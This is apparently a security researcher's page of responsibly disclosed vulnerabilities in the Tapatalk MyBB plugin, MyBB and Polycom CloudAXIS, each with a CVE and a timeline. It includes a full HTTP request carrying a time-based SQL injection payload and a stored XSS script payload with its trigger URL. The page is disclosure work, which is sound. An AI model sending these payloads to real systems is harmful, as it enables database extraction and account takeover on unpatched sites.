Adrian Hayter

Exploits

The following exploits were found by myself and responsibly disclosed to all relevant parties before their public disclosure here.

Tapatalk for MyBB Plugin SQL Injection Vulnerability (CVE-2017-14652)


A time-based blind SQL injection exists in the mobiquo/lib/classTTForum.php file in the Tapatalk for MyBB Plugin, for versions prior to 4.5.8. The vulnerability allows an unauthenticated user to inject SQL as part of the user registration process. The injection occurs within a SELECT statement and as such could be used to extract data from the database.

CVSS v2 Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)

Proof of Concept


Set the correct host header on the below request and send it to a MySQL based installation of MyBB with the Tapatalk plugin installed. 
POST /mobiquo/mobiquo.php HTTP/1.1
Host: <insert-correct-host-header>
Accept: */*
mobiquoid: 2
Mobiquo_id: 2
Accept-Language: en-us
Content-Type: text/xml
Content-Length: 498
Connection: keep-alive
Cookie: tapatalk=1
TT-VERSION: 1844

<methodCall><methodName>sign_in</methodName><params><param><value><string></string></value></param><param><value><string></string></value></param><param><value><base64>dGVzdEBleGFtcGxlLmNvbQ==</base64></value></param><param><value><base64>dXNlcm5hbWU=</base64></value></param><param><value><base64>cGFzc3dvcmQ=</base64></value></param><param><value><struct><member><name>test' AND SLEEP(10) -- a</name><value><base64>dGVzdA==</base64></value></member></struct></value></param></params></methodCall>
If successful the MySQL instance should sleep for 10 seconds.

Timeline


July 30th 2017 - Vulnerability discovered and disclosed privately to Tapatalk.
July 31st 2017 - Vulnerability fixed in Tapatalk for MyBB Plugin v4.5.8.
Sept 12th 2017 - Vulerability disclosed publicly here.


MyBB Cross-site Scripting (XSS) Vulnerability (CVE-2015-4552)


A persistent Cross-site Scripting (XSS) vulnerability exists in the /xmlhttp.php file in MyBB (aka MyBulletinBoard) versions before 1.8.5 which allows remote attackers (authenticated and in some cases unauthenticated) to inject arbitrary web script or HTML into their posts. Whilst the injected code is not rendered in posts themselves, if the post's quick edit AJAX URL is opened in a browser window, the injected code would be rendered. Since administrators / moderators can use the quick edit feature on any posts, this vulnerability could be used to target administrator / moderator accounts.

CVSS v2 Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N/E:F/RL:OF/RC:C)

Proof of Concept


Create a post with the content set to: 
<script>alert(1)</script>
Get the ID of the post from the HTML (there are numerous locations where it is used) and use it in the following URL: 
http://example.com/xmlhttp.php?action=edit_post&do=get_post&pid=ENTER_POST_ID_HERE
Open the URL in a browser window. The JavaScript should execute and create an alert box with the contents "1". This URL will work for the user who created the post, administrators, super moderators, and moderators with permissions to edit posts in the forum the post was made. All other users will see a permissions error.

Timeline


April 28th 2015 - Vulnerability discovered and disclosed privately to MyBB team.
April 29th 2015 - Vulnerability report accepted and bug confirmed by MyBB team.
May 27th 2015 - Vulnerability fixed as part of MyBB 1.8.5.
June 15th 2015 - Vulnerability disclosed publicly here.


Polycom RealPresence CloudAXIS Suite Cross-site Scripting (XSS) Vulnerability (CVE-2015-1516)


A persistent Cross-site Scripting (XSS) vulnerability exists in Polycom RealPresence CloudAXIS Suite versions prior to 1.7.0 which allows a remote authenticated user to inject arbitrary JavaScript or HTML into the application. Injected code is rendered and executed by a victim's web browser as soon as they join the session.

This vulnerability was found whilst working for CNS Hut3.

CVSS v2 Vector: (AV:N/AC:L/Au:S/C:N/I:P/A:N/E:POC/RL:OF/RC:C)

Timeline


Sept 16th 2014 - Vulnerability discovered.
Nov 20th 2014 - Vulnerability disclosed to Polycom Security Team.
Dec 12th 2014 - Vulnerability report accepted and bug confirmed as fixed pending testing and verification.
April 2015 - Vulnerability fixed as part of 1.7.0 update.
June 18th 2015 - Vulnerability disclosed publicly here.